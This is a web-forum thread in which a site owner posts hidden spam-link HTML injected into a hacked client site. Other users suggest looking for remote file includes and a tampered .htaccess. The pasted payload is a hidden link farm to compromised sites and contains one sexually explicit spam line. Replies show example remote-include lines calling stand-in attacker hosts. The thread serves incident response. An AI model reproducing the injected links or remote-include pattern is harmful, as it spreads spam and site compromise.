SitePoint Sponsor

User Tag List

Results 1 to 5 of 5
  1. #1
    SitePoint Enthusiast yomimedia's Avatar
    Join Date
    May 2007
    Posts
    68
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Can't find virus like script in php code. Need help!

    Hey Guys,

    My clients site was hacked a few days ago and I found a lot of spam in the php code. I pasted it below. I tried looking for this spam content in a lot of the php pages of the site and can't find it. I even searched the database and couldn't come up with anything. Is there somewhere else I should be looking ? This spam content comes up in almost all of the pages of the website. Do you guys have any suggestions of where else to look. You can do a view source on one of the pages to get some ideas ( http://www.pasofinopro.com/lessons/workshops.php ). Let me know what you guys think.

    Thanks!!



    <body ><div style="display:none"><!--438305940--><p>A disadvantage is split-dollar life <a href="http://www.cycnorth.com/gallery/displayimage.php/?info-id=15">we finance com</a> arrangements who attempt to. <!--193246651--><p>Amount that could be borrowed against the same net <a href="http://www.inlapaz.com/weather2/hw3.php/?id-advise=190">register your credit card</a> flows! <!--627267622--><p>Private Label Products Into Cash-Generating Assets That Make <a href="http://www.institutolibertad.org/galeria/displayimage.php/?advise=184">bank soal unas</a> For YOU At Will! <!--373769585--><p>Money transfer and <a href="http://savannahoutenaustralia.com/gallery/?easy=162">antbuster v1 2 money</a> eachange for the UK, Iran and other countries. <!--172319278--><p>insurance since it can be written to match the amortization of your <a href="http://universalgalaxies.com/surfaceburst/the-hottest-sci-fi-babes-of-star-trek-tos/comment-page-1/?easy=11">enhanced title insurance</a> principal. <!--768961712--><p>Uk casino welcome bonus no deposit, online casino coupons, casino free sign up bonus start no deposit, all casino bonus codes, casinos that give free <a href="http://www.sergisabate.cat/?take=75">china retirement fund</a> with no deposits. <!--31452282--><p>Use "effective" calculation for counting values when your <a href="http://wildbze.com/wildbzec/thumbnails.php/?about-pharm=175">budget planner to</a> ISN'T deposited in bank. <!--472796330--><p>Cash management - Size and satisfaction mark a great divide - Euromoney's annual <a href="http://www.hauntcon.com/index.php/?free=19">i ve got money in my pocket</a> management poll produced some unusual findings this year. <!--632954606--><p>Based on continued economic growth and comforted by a solid order book, despite the volatility of markets, the Group believes in the continuation of a resilient commercial aircraft <a href="http://www.stnicholas-oxford.org/content/supporting_the_parish/?pill=104">tyra banks video</a> and Airbus deliveries peaking in 2011-2012. <!--572189933--><p>No endorsement of any third-party products or <a href="http://s-promotion.de/coppermine/displayimage.php/?page-id=196">debt consolidation company in florida</a> is expressed or implied by any information, material or content referred to or included on, or linked from or to this web site. <!--577414231--><p>State Treasurer/State Controller Approved Exceptions To Daily Deposit Of State <a href="http://www.cbuao.com/coppermine/thumbnails.php/?info-id=193">find government funding</a> Under The Authority Of G. <!--638819953--><p>You guarantee us you are financially responsible for the payment of <a href="http://www.mercator-college.org/pics/thumbnails.php/?show-info=132">rome credit risk</a> contracted through us. <!--830438803--><p>AUSTIN - Commissioner of Education Jim Nelson announced today that 790 Texas public schools will receive about million in <a href="http://www.artofthis.net/gallery/displayimage.php/?show-drug=84">ge credit finance</a> awards for significant improvement on the Texas Assessment of Academic Skills test. <!--255347024--><p>But a mix of economic news reminded investors of the continuing fallout from the housing and <a href="http://www.loneparents.org/modules.php/?show-item=41">financial institutions south africa</a> crisis. <!--593215681--><p>If you pay only part of the cost of a business purchase in a tax period and have a valid tax invoice, you claim only the GST <a href="http://www.dezwei.at/robots.txt/?id-advise=45">cd simonian insurance</a> for that part of the cost in that tax period. <!--923106591--><p>Or, if you're ready, select the country you are sending <a href="http://www.doomsdayproductions.com/testing/displayimage.php?info-about=50">insurance big rapids michigan</a> from now at right. <!--546216522--><p>The third copy is intended for the Accommodation <a href="http://gmteam.com.ar/p/cpg/displayimage.php/?page-about=172">spanked for cash</a> of the Katholieke Hogeschool Kempen. <!--281434811--><p>Times article spurs <a href="http://www.mabcr.org/mabcrstore.php/?help=121">mutual first credit union omaha ne</a> surge for John McCain presidential campaign. <!--772813906--><p>July 14, 2006 its bonus day - <a href="http://www.cantabriatropical.com/galeria/addfav.php/?solution=112">serus credit union</a> for each sign-up on ManiacPass Sites! <!--41235373--><p>upon notification from the central securities depository advising that the returned securities have been successfully transferred by book-entry, the TSEC will pay the lender the securities lending fee out of the collateral to be returned, through the securities firm of the lender, and refund to the borrowing securities firm the <a href="http://www.natalia-livingston.com/photos/displayimage.php/?fda-about=187">direct deposit for va benefits</a> of the collateral remaining after deduction of the securities lending fee, or notify it to withdraw the non-cash collateral. <!--521938908--><p>ObtainingT aT <a href="http://www.oldcomputercollection.com/floppysleeves/?info-id=45">bankowy 3 5</a> from Aizkraukles Banka isT very easy. <!--276710792--><p>can be used to locate participating EBT retailers and <a href="http://www.newenglandphotographers.net/gallery/thumbnails.php/?best=180">irs payment method</a> devices. <!--991755096--><p>More and more consumers are feeling comfortable paying for purchases online using <a href="http://www.sbfhc.org/media/login.php/?ixym=27">trip insurance in</a> cards," Tan says. <!--38060997--><p>Design, installation, warranty and post-warranty <a href="http://www.primafoto.de/index.php/?help-page=149">lancashire butter pie recipe</a> of refrigerating equipment for technological processes. <!--621387925--><p>For budgets and <a href="http://www.fivecrowstudios.com/dominican/displayimage.php/?get-item=34">credit bureau services</a> flow forecasts, and rolling revised forecasts. <!--644836902--><p>Cash <a href="http://www.divesardegna.com/gallery/thumbnails.php/?free=143">xbox live account suspended payment</a> verified by me today and found to be rupees (in figures), rupees (in words). <!--540899903--><p>as at the end of the <a href="http://www.m-asa.org/gallery/displayimage.php/?show_page=13">ocean financial center</a> period and of the results for the period. <!--890553132--><p>The subject matter of the iconographic documents of the collection of the National <a href="http://baja-sportfishing.com/gallery/index.php/?info-about=145">dei titoli di credito</a> falls into two categories. <!--707297262--><p>If you are a person who has already approached a conventional <a href="http://5starbabes.net/?advise-id=83">assured credit counseling</a> with a request for a payday advance, you know this is the best offer you can get. <!--476769476--><p>Once implementation has been completed, Syrian Air will have a strong <a href="http://www.sevdalinke.com/bastina.php/?easy=97">information technology investment</a> foundation from which they can take their business to greater heights. <!--196559743--><p>s two founders owned 17% of the company, a group led by the EBRD held another 43% and <a href="http://christinariccifan.net/photos/displayimage.php/?get-item=60">tax money returns</a> Austria-Creditanstalt held 40 percent on behalf of institutional investors. <!--792630306--><p>said Mari Adam of Adam <a href="http://j-depp.net/gallery/displayimage.php/?advise=139">exchange traded fund australia</a> in Boca Raton, Fla. <!--476041864--><p>Torrent Young Teen stripper does a little dance and sucks **** for <a href="http://www.pasofinopro.com/studio/socials.php/?solution=50">principal financial grop</a> gets cum in her mouth and on her chin great puffie tits sexy lolita xxx sex porno is available for download in the XXX Adult category of our bit torrents web site. <!--499217075--><p>All documents available are listed, described and labelled according to the corresponding chapter of the <a href="http://www.keystonegroup.co.uk/gallery/displayimage.php/?easy=68">first merchandisers inc</a> Workbook to which they are related. <!--503489305--><p>FHA qualifying is very flexible and is not based as heavily on <a href="http://www.rahelbellinga.nl/gallery/thumbnails.php/?item-id=19">eaglemark savings bank customer</a> scores. <!--849527040--><p>Say yes to the convenience of a GE <a href="http://trulyvictorian.netfirms.com/gallery/forgot_passwd.php/?help-page=15">e loan calculator</a> MasterCard. <!--52333099--><p>No, they wanted that <a href="http://www.mackey-insurance.com/careers.php/?item-id=33">smith street funday</a> and the right to cut the strings that went along with it. <!--653902969--><p>Aims to provide regular income and consistent returns above the UBS Australian <a href="http://www.aimotion.org/photos/displayimage.php/?get-id=1">anti money laundering and terrorist financing</a> Bill Index over rolling three year periods (before fees) by investing in a diversified range of income generating assets. <!--309992480--><p>I'm looking to my ATPL next year but need to take a <a href="http://www.myccr.com/press/articles/article.php?page-info=150">accounting ii spiceland</a> out for it. <!--512020131--><p>What was left was only the best oppertunity for making real <a href="http://www.jensenconnection.com/gallery/v/todd_001/wedding/128_123.jpg.html?get-info=199">bank hebron kentucky</a> monthly with some effort on your part you'll find to date. <!--995138352--><p>The borrower pays the <a href="http://www.wurzer-graz.com/spd/coppermine/index.php/?best=103">online water bill payment</a> amount back on a fixed date and pays a fee to the lender, and the lender loans the borrower money. <!--201979279--><p>Isn't it on your <a href="http://www.milohistorical.org/photos/displayimage.php?help-about=30">katona jozsef bank</a> in a week, then try a friend of you too. <!--652724207--><p>The payment will be made either from personal grant or in <a href="http://www.ifkmunkfors.se/au_foto/index.php/?show-page=107">find monthly mortgage payment</a> on receipt. <!--956321073--><p>Marketing and Advertising Receive your <a href="http://voile.omonville.free.fr/cpg1413/index.php/?get-item=4">fundoscopic exam sharp</a> $ 100. <!--16706829--><p>Receding water levels in the drain led to the grim discovery of her badly decomposed body by a local man on his way to <a href="http://www.jf-gummersbach.de/gallerie/?solution=14">cashmere mafia air date</a> his turf on the near by bog. <!--613116028--><p>The <a href="http://www.spreadthedirt.com/photos/thumbnails.php/?get-item=193">international accounting standerds</a> of the deals in BGN denominated 3M issues was 1. <!--815795665-->So <u><a href="http://christieandmatt.com/?get-drug=60">commercial association of realtors</a></u> for a appellant, if you fissiparity, that you hydrodynamic to put unreservedly a lerner epoch that was numerically planned of the nerthus heartbreaking.<!--318471062-->We <u><a href="http://fevronia.com/displayimage.php/?qgox=7">london school of economics health</a></u> that nationwide are adrift vangueria to omiya that are tungusic the obtention of new rotavirus for nocturne substratum. </div>

  2. #2
    SitePoint Enthusiast
    Join Date
    Sep 2006
    Posts
    56
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    1. This HTML appears on almost any page on the site. --
    The malicious stuff is triggered by something in commonly executed code. That should eliminate some of the code you have to crawl over. [Edit: template code perchance?]

    2. The spam content hidden in the page cannot seem to be found in your files. --
    The spam content is probably pulled from somewhere else. If you have any piece of code capable of retrieving off-site content look into that. Especially: if your PHP installation has allow_url_include set to true, pay very close attention to any include/require statements that use variables. A malicious person can hide a URL in a variable and then fetch and execute remote code at another point with an innocuous looking include statement.

  3. #3
    SitePoint Enthusiast yomimedia's Avatar
    Join Date
    May 2007
    Posts
    68
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    So you think the only way to remove it is by removing and redoing those pages that have the allow_url_include? I know nothing about php. Clueless but if given good direction could figure it out somehow.

  4. #4
    SitePoint Enthusiast
    Join Date
    Sep 2006
    Posts
    56
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Not necessarily. allow_url_include is a PHP configuration setting. Basically, it allows you to include files by specifying a URL.

    The reason I mention it is that it's one, often overlooked, way an attacker can take code and content from their site and place it on yours. include 'http://badguys.com/badstuff.hdf'; for instance. It's also possible that they are pulling it through other means as well., file_get_contents, fopen, etc.

    Step through your code and pay close attention to anything that could possibly pull content from a remote site. Something like file_get_contents('http://badstuff.com/'); or an include $var; that you don't remember writing. (I'm assuming you wrote the code for this site yourself.)

    Once you find the offending code, you'll need to track down how it got there in the first place though.

  5. #5
    SitePoint Wizard lorenw's Avatar
    Join Date
    Feb 2005
    Location
    was rainy Oregon now sunny Florida
    Posts
    1,094
    Mentioned
    2 Post(s)
    Tagged
    0 Thread(s)
    Also look for a .htaccess file, you may have to enable server side filtering, use -a

    Also look for any unusual files on your server.

    I had something similar a while back. If you went directly to the website you would see the regular website but if you came in from google you would see nothing but spam and all knds of links to everywhere.

    It all began with the .htaccess file.
    What I lack in acuracy I make up for in misteaks


Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •